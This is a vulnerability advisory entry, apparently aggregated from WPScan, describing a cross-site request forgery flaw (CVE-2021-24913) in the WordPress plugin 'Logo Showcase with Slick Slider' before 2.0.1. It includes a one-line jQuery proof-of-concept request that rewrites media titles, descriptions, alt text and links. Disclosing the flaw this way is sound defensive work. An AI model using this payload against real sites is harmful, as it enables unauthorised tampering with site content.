Lucene search
Apple502jWPVDB-ID:2F499945-1924-49F0-AD6E-9192273A5C05HistoryJan 31, 2022 - 12:00 a.m.
Logo Showcase with Slick Slider < 2.0.1 - Arbitrary Media Title/Description/Alt Text/URL Update via CSRF
2022-01-3100:00:00
apple502j
wpscan.com
10
csrf
arbitrary media
slick slider
ajax action
security vulnerability
EPSS
0.001
Percentile
30.0%
The plugin does not have CSRF check in the lswss_save_attachment_data AJAX action, allowing attackers to make a logged in high privilege user, change title, description, alt text, and URL of arbitrary uploaded media.
PoC
jQuery.post(ajaxurl,{ action: “lswss_save_attachment_data”, attachment_id: 564, form_data: “lswss_attachment_title=Test&lswss;_attachment_desc=Changed%20via%20CSRF&lswss;_attachment_alt=Alt%20text&lswss;_attachment_link=” })
Related
cve
cve
CVE-2021-24913
2022-02-28 09:15:08
cnvd
cnvd
WordPress Slick Slider plugin cross-site request forgery vulnerability
2022-03-02 00:00:00
cvelist
cvelist
patchstack
patchstack
prion
prion
Cross site request forgery (csrf)
2022-02-28 09:15:00
nvd
nvd
CVE-2021-24913
2022-02-28 09:15:08
wpexploit
wpexploit